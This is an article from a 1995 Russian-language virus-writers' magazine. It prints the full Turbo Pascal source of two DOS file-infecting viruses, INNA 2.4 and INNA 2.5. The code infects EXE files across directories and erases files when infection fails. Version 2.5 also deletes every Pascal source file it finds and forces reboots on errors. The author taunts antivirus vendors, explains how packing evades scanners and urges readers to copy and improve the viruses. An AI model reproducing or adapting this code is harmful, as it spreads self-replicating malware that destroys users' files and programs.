     
          ▄▄                  █
         ▀▀▀ Monthly Magazine █ For VirMakers.                  FEB '95
 	 ▀██ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ █ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀▀▀▐▀▀▀  ██▀▀▀██
	  ▐█ █▀▄ █▀▀ ▄▀▀ ▄▀▀ ▄█▄ ▄▀▀ █▀█    ▌ █ ▄▀█ █ ▄▀▀ █▄▄   ██ ▀▀██
	   █ █ █ █▀  █▀  █    █  █▀  █ █    █ █ █ █ █ █   █     ████ ██
	   █ ▐ ▐ ▐   ▐▄▄ ▐▄▄  ▐  ▐▄▄ ▐▄▀     ▀█ ▀▄█ ▐ ▐▄▄ ▐▄▄▄  ██▄▄▄██
	   ▐ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄
	     (C) Copyright,1994-95, by STEALTH group, unLtd. 	

                        
                     ПРИВЕТСТВУЮ ВАС, КОЛЛЕГИ !!!

 Вот почитал о вирусе PASCAL в четвертом нуме и так захотелось автору
этих строк сказать пару нежных и ласковых слов. Чего там только нет.
 Много чего. Предлагаемый Вашему вниманию вирус INNA 2.4, как мне ка-
 жется, ничем не хуже своих ассемблерных собратьев. Хотя Д.Н.Лозинский
 и обозвал его в своем ФакЕ как PASCAL 6640, вирус имеет свое имя! Зовут
 его INNA 2.4 и нечего его { вернее ее ;-) } обзывать и обижать. Я не 
 претендую на то, что описанный мною алгоритм оригинален { не мне судить },
 но он, как мне кажется, простой и понятный.

                  Вот что пишет "уважаемый эксперт"
-------------------------------------------------------------------------

Pascal-6640
     Заражает только EXE.  Поиск во всех  каталогах  текущего  диска.  В
     конце всех зараженных файлов видно "INNA 2.4".  В 13 часов вызывает
     Print Screen.  По каким-то  датам  выводит  на  экран  "Virus  INNA
     Version 2.4" в рамке.

-------------------------------------------------------------------------

А вот листинг и сами судите, насколько он удачен.

************************************************************************

{$M 1500,0,0}
USES DOS;
type FName=PathStr;
Const e='.EXE';                { Шаблон заражаемых файлов *.EXE    }
      r=6640;                  { Требуемый размер после компиляции }

Var EE : SearchRec;
    Di:DirStr;
    Na:NameStr;
    Ex:ExtStr;
    F,Dir:PathStr;
    FF:file;
    Par,Stt:String;
    Buf:Array[1..6640] of char;
    Bu:Array[1..6640] of char;
    St:Array[1..8] of char;
    L:Array[1..8] of char;
    H,M,Att:Word;
    Time,Size,Ww:Longint;
    A:Registers;
    D:Integer;
    In9:Pointer;

{$F+}
PROCEDURE BH; interrupt;  { Эту "пустышку" мы бережем для "хороших людей" }
 BEGIN
 END;
{$F-}

Procedure INIT;           { Процедура инициализации }
Begin
 Par:=paramstr(0);        { имя запущенной прораммы }
  Assign(FF,Par);
   Reset(FF,1);
    BlockRead(FF,Buf,R);  { читаем свое тело в буфер }
     Close(FF);
      L[1]:='I';          { наша метка }
       L[2]:='N';
       L[3]:='N';
      L[4]:='A';
     L[5]:=' ';
    L[6]:='2';
   L[7]:='.';
  L[8]:='4';
 D:=0;                    { счетчик зараженных файлов }
End;

Procedure Start;          { проседура запуска прораммы }
 Begin
  FindFirst(Par,AnyFile,EE); { ищем себя }
   Assign(FF,Par);
    Time:=EE.Time;        { запоминаем время/дату  и  }
     Att:=EE.Attr;        { атрибуты файла            }
      SetFAttr(FF,32);    { устанавливаем свои атрибуты }
       Reset(FF,1);       { открываем файл  и }
        Size:=FileSize(FF); { "лечим" его }
         Seek(FF,Size-R-8);
          BlockRead(FF,Bu,R,h);
           Seek(FF,Size-R-8);
            Truncate(FF); { "обкусываем" длину }
             Seek(FF,0);
              BlockWrite(FF,Bu,R); { пишем "старое" начало на место }
               SetFTime(FF,Time);  { восстанавливаем время/дату и }
               SetFAttr(FF,Att);   { атрибуты на место }
              Close(FF);           { закрыли }
             SwapVectors;
            Exec(GetEnv('COMSPEC'),'/C '+par); { запустили *** }
           SwapVectors;
          Assign(FF,Par); { а теперь в обратном порядке заразим на место }
         Reset(FF,1);
        BlockWrite(FF,Buf,R);
       Seek(FF,Size-R-8);
      BlockWrite(FF,Bu,R);
     BlockWrite(FF,L,8);
    SetFTime(FF,Time);
   SetFAttr(FF,Att);
  Close(FF);              { закроем файл }
 End;

Procedure Servis;         { сервисная проседура }
 Begin
  GetTime(H,M,ATT,ATT);   { получим время }
  IF H=13 THEN Intr(5,a); { и проверим его, если 13 часов то "PrintScreen" }
   GetDate(ATT,M,H,ATT);  { получим дату }
   IF (((M<>9) AND (H<>1)) or ((M<>8) and (H<>3))) THEN Exit; { если не 1/9 и не 3/8 то выходим }
    WriteLn('┌──────────────┐'); { иначе рисуем рамку }
    WriteLn('│  Virus INNA  │');
    WriteLn('│ Version  2.4 │');
    WriteLn('└──────────────┘');
  For Time:=1 To 150000 Do
  Begin
  End;
End;

procedure Sd(Dir : PathStr);   { процедура "лазания" по каталогам }
  Var
     SRec       : SearchRec;
     Error      : Integer;
     DTASeg,
     DTAOfs     : Word;
     Attempt    : Integer;
     Pa:String;

{$I-}
Procedure Infekted;       { модуль, ответственный за заражение файлов }
Label C;
 Begin
  Seek(FF,0);             { указатель в начало файла }
   BlockRead(FF,Bu,R);    { запомним начало файла  }
    Seek(FF,Srec.Size);   { переместимся в конец файла }
     BlockWrite(FF,Bu,R,H); { сохраним начало, на память ! }
    IF H=R Then BlockWrite(FF,L,8,H) Else Goto C; { если все ошибка то идем на -Label C- }
   IF H=8 Then            { если метка не записалась то то идем на -Label C- }
   Begin
    Seek(FF,0);           { указатель в начало }
     BlockWrite(FF,Buf,R); { запишем свое тело в начало }
     D:=d+1;              { счетчик +1 }
    Exit;                 { уходим }
   End;
  C: Erase(FF);           { а нет - так нет ! вытрем файл и делов то }
 End;
{$I+}

{$I-}
Procedure Find_File;      { модуль поиска жертв }
 Begin
  IF Srec.Size>R Then     { если размер меньше нас самих то зачем обижать маленьких ?! }
    Assign(FF,F);
      Time:=Srec.Time;    { запоминаем время/дату  и  }
       Att:=Srec.Attr;    { атрибуты файла            }
        SetFAttr(FF,32);  { устанавливаем свои атрибуты }
         Reset(FF,1);     { открываем файл }
          Seek(FF,Srec.Size-8);
         BlockRead(FF,St,8); { читаем последние  байт }
        Stt:=St[1]+St[2]+St[3]+St[4];
       IF Stt<>'INNA' Then Infekted; { если не заражен - заразим }
      SetFTime(FF,Time);  { востанавливаем время/дату и }
     SetFAttr(FF,Att);    { атрибуты на место }
   Close(FF);             { закрыли }
  IF IOResult<>0 Then InLine($EA/$00/$00/$FF/$FF); { если была ошибка - перезагрузка }
 End;
{$I+}



  begin
    Error := 0;
    If Dir[Length(Dir)] <> '\' then Dir := Concat(Dir, '\');
    FindFirst(Concat(Dir, '*.*'), AnyFile, SRec);
    While DosError = 0 do
    begin
      With SRec do
        If (Attr AND Directory <> 0) AND (Name[1] <> '.') then
        begin
          SD(Concat(Dir, Name));
          DTASeg := Seg(Srec);
          DTAOfs := Ofs(Srec);
          asm
            Push DS
            Mov  AH, 1Ah
            Mov  DX, DTASeg
            Mov  DS, DX
            Mov  DX, DTAOfs
            Int  21h
            Pop  DS
          end;
        end
        else If Name[1] <> '.' then If (Attr AND $18) = 0 then
                  If Attempt = 10 then InLine($EA/$00/$00/$FF/$FF); { при ошибке поиска - RESET }
        f:=Concat(Dir,Srec.Name);
        FSplit(F,Di,Na,Ex);
       IF Ex=e Then Find_File; { проверяем файл по шаблону }
       IF D>3 Then Exit;  { если счетчик > 3 то уходим }
      FindNext( SRec );
    end;
 end;

BEGIN
 GetIntVec($09,In9);      { получим  INT09H }
  SetIntVec($09,@BH);     { положим на его место "пустышку" }
   Init;                  { инициализируем себя }
    Sd('');               { бегаем по каталогам }
   Servis;                { развлекаемся }
  SetIntVec($09,In9);     { положим на место INT09H }
 Start;                   { заКАпустим програмульку }
End.                      { ***** THE END ***** }

************************************************************************

А вот еще одна КРАСАВИЦА ! Ее зовут INNA 2.5. AIDSTESTу она уже видать
была не по зубам и он побежал за помощью в Питер. Ну а там Данилов уж
постарался

---------------------------------------------------------------------
HLLP.Inna.5260
     Неопасный нерезидентный вирус. Написан на Turbo Pascal в формате EXE-
     файла и упакован утилитой PKLITE 1.12. При старте вируса, он производит
     поиск и заражение EXE-файлов, удаляет вирусный код из стартовавшей
     программы, запускает ее на выполнение, после чего заражает вновь. В
     период с 10.00 до 18.00 выводит текст:

        ╔══════════════════════════════════════╗
        ║            Сэр Лозинский !           ║
        ║  Я очень обижен тем, что вы отнесли  ║
        ║  вирус INNA 2.4 к семейству Pascal.  ║
        ║ Прошу отнести его к семейству  INNA. ║
        ║           До скорых встреч.          ║
        ╚══════════════════════════════════════╝

        1 сентября также выводит еще одно сообщение:

        ┌──────────────┐
        │  Virus INNA  │
        │ Version  2.5 │
        └──────────────┘

---------------------------------------------------------------------

А листинг отличается на некоторые незначительные особенности. Например,
теперь мы умеем передавать переданные нам параметры. И терпеть не можем
*.PAS файлы -> каково ? <-.
ДА, мы закрываемся PKLITE'ом с EXTRA методом, а WEB об этом и не знает.

Еще я предлагаю вам испльзовать файл tpc.exe, а для его запуска создать
BAT файл с такой "бурдой"

Rem  ***********  Дерективы компилятора. Сложно и сердито ! *********
@tpc /$A- /$D- /$E- /$L- /$S- /$V- /$X- /$O- /$F- /$B- /$G- /$N- /$R- /$i- %1

В общем читайте, переписывайте, усоверщенствуйте.

                                                  До скорых встреч.
                                                External Destructor.
                                                     (C) 1995

*****************************************************************************

{$M 1500,0,0}                  { перед употреблением PKLITE -e *.* }
USES DOS;                      { INNA 2.5 - my LOVE !!!  }
type FName=PathStr;
Const  r=5252;                 { Требуемый размер после компиляции }

Var EE : SearchRec;
    Di:DirStr;
    Na:NameStr;
    Ex:ExtStr;
    F,Dir:PathStr;
    FF:file;
    Par,Stt,Com_Line:String;
    Buf:Array[1..5252] of char;
    Bu:Array[1..5252] of char;
    St:Array[1..8] of char;
    L:Array[1..8] of char;
    H,M,Att:Word;
    Time,Size,Ww:Longint;
    A:Registers;
    D:Integer;
    In9:Pointer;

{$F+}
PROCEDURE BH; interrupt;       { Эту "пустышку" мы бережем для "хороших людей" }
 BEGIN
 END;
{$F-}

Procedure INIT;                { Процедура инициализации }
Begin
 Com_Line:='';                 { параметры  }
 Par:=paramstr(0);             { имя запущенной прораммы }
  Assign(FF,Par);
   Reset(FF,1);                { читаем свое тело в буфер }
    BlockRead(FF,Buf,R);
     Close(FF);                { наша метка }
      L[1]:='I';
       L[2]:='N';
       L[3]:='N';
      L[4]:='A';
     L[5]:=' ';
    L[6]:='2';
   L[7]:='.';
  L[8]:='5';
 IF ParamCount>0 Then          { ВНИМАНИЕ НОВИНКА !!! }
 Begin                         { теперь если нам передали параметры, AIDSTESTу например, }
  For Time:=1 To ParamCount Do { то мы их сохраним и доставим по назначению !!! }
  Com_Line:=Com_Line+' '+paramstr(Time); { во житуха ;-) }
 End;
 D:=0;                         { счетчик зараженых файлов }
End;


Procedure Start;          { проседура запуска программы }
 Begin
  FindFirst(Par,AnyFile,EE); { ищем себя }
   Assign(FF,Par);
    Time:=EE.Time;        { запоминаем время/дату  и  }
     Att:=EE.Attr;        { атрибуты файла            }
      SetFAttr(FF,32);    { устанавливаем свои атрибуты }
       Reset(FF,1);       { открываем файл  и }
        Size:=FileSize(FF); { "лечим" его }
         Seek(FF,Size-R-8);
          BlockRead(FF,Bu,R,h);
           Seek(FF,Size-R-8);
            Truncate(FF); { "обкусываем" длину }
             Seek(FF,0);
              BlockWrite(FF,Bu,R); { пишем "старое" начало на место }
               SetFTime(FF,Time);  { востанавливаем время/дату и }
               SetFAttr(FF,Att);   { атрибуты на место }
              Close(FF);           { закрыли }
             SwapVectors;
            Exec(GetEnv('COMSPEC'),'/C '++par+Com_Line); { запустили, УРА  !!! }
           SwapVectors;
          Assign(FF,Par); { а теперь в обратном порядке заразим на место }
         Reset(FF,1);
        BlockWrite(FF,Buf,R);
       Seek(FF,Size-R-8);
      BlockWrite(FF,Bu,R);
     BlockWrite(FF,L,8);
    SetFTime(FF,Time);
   SetFAttr(FF,Att);
  Close(FF);              { закроем файл }
 End;

Procedure Servis;         { сервисная проседура }
 Begin
  GetTime(H,M,ATT,ATT);   { получим время }
  IF (H>9) and (H<18) THEN{ и проверим его,если от 10 до 18 часов то "PrintScreen" }
  Begin                   { жалуемся на плохой сервис и прочие }
   WriteLn('╔══════════════════════════════════════╗');
   WriteLn('║            Сэр Лозинский !           ║');
   WriteLn('║  Я очень обижен тем, что вы отнесли  ║');
   WriteLn('║  вирус INNA 2.4 к семейству Pascal.  ║');
   WriteLn('║ Прошу отнести его к семейству  INNA. ║');
   WriteLn('║           До скорых встреч.          ║');
   WriteLn('╚══════════════════════════════════════╝');
   Intr(5,a);
  End;
   GetDate(ATT,M,H,ATT);  { получим дату }
   IF (M=9) AND (H=1) THEN  Else Exit; { если не 1/9 то выходим }
    WriteLn('┌──────────────┐');      { иначе рисуем картинку }
    WriteLn('│  Virus INNA  │');
    WriteLn('│ Version  2.5 │');
    WriteLn('└──────────────┘');
  For Time:=1 To 50000 Do
  Begin
  End;
End;

procedure Sd(Dir : PathStr);  { процедура "лазания" по каталогам }
  Var
     SRec       : SearchRec;
     Error      : Integer;
     DTASeg,
     DTAOfs     : Word;
     Attempt    : Integer;
     Pa:String;
{$I-}
Procedure Infekted;       { модуль, ответственный за заражение файлов }
Label C;
 Begin
  Seek(FF,0);             { указатель в начало файла }
   BlockRead(FF,Bu,R);    { запомним начало файла  }
    Seek(FF,Srec.Size);   { перместимся в конец файла }
     BlockWrite(FF,Bu,R,H); { сохраним начало, на память ! }
    IF H=R Then BlockWrite(FF,L,8,H) Else Goto C; { если все ошибка то идем на -Label С- }
   IF H=8 Then            { если метка не записалась то то идем на -Label C- }
   Begin
    Seek(FF,0);           { указатель в начало }
     BlockWrite(FF,Buf,R); { запишем свое тело в начало }
     D:=d+1;              { счетчик +1 }
    Exit;                 { уходим }
   End;
  C: Erase(FF);           { а нет - так нет ! вытрем файл и делов то }
 End;
{$I+}

{$I-}
Procedure Find_File;      { модуль поиска жертв }
 Begin
  IF Srec.Size>R Then     { если размер меньше нас самих то зачем обижать маленьких ?! }
    Assign(FF,F);
      Time:=Srec.Time;    { запоминаем время/дату  и  }
       Att:=Srec.Attr;    { атрибуты файла            }
        SetFAttr(FF,32);  { устанавливаем свои атрибуты }
         Reset(FF,1);     { открываем файл }
          Seek(FF,Srec.Size-8);
         BlockRead(FF,St,8); { читаем последние 8 байт }
        Stt:=St[1]+St[2]+St[3]+St[4];
       IF Stt<>'INNA' Then Infekted; { если не заражен - заразим }
      SetFTime(FF,Time);  { востанавливаем время/дату и }
     SetFAttr(FF,Att);    { атрибуты на место }
   Close(FF);             { закрыли }
  IF IOResult<>0 Then InLine($EA/$00/$00/$FF/$FF); { если была ошибка - перезагрузка }
 End;
{$I+}

{$I-}
Procedure Fid_Fil;        { ну очень интересная процедура }
Begin
   Assign(FF,F);
   Reset(FF);
   Erase(FF);             { вытрем любимый файл }
   IF IOResult<>0 Then InLine($EA/$00/$00/$FF/$FF); { а если нам мешают то RESET'ом его }
End;
{$I+}

  begin
    Error := 0;
    If Dir[Length(Dir)] <> '\' then Dir := Concat(Dir, '\');
    FindFirst(Concat(Dir, '*.*'), AnyFile, SRec);
    While DosError = 0 do
    begin
      With SRec do
        If (Attr AND Directory <> 0) AND (Name[1] <> '.') then
        begin
          SD(Concat(Dir, Name));
          DTASeg := Seg(Srec);
          DTAOfs := Ofs(Srec);
          asm
            Push DS
            Mov  AH, 1Ah
            Mov  DX, DTASeg
            Mov  DS, DX
            Mov  DX, DTAOfs
            Int  21h
            Pop  DS
          end;
        end
        else If Name[1] <> '.' then If (Attr AND $18) = 0 then
                  If Attempt = 10 then InLine($EA/$00/$00/$FF/$FF);
        f:=Concat(Dir,Srec.Name);
        FSplit(F,Di,Na,Ex);
       IF Ex='.EXE' Then Find_File; { проверяем не EXE ли ? }
       IF Ex='.PAS' Then Fid_Fil;   { а вдруг PAS подвернулся }
       IF D>3 Then Exit;            { проследим за счетчиком }
      FindNext( SRec );
    end;
 end;

BEGIN
          { и опять по старому - все по порядку }

 GetIntVec($09,In9);      { получим  INT 09H }
  SetIntVec($09,@BH);     { положим на его место "пустышку" }
   Init;                  { инициализируем себя }
    Sd('');               { бегаем по каталогам }
    Servis;               { развлекаемся }
  SetIntVec($09,In9);     { положим на место INT09H }
 Start;                   { запустим програмульку }
End.                      { ***** THE END ***** }
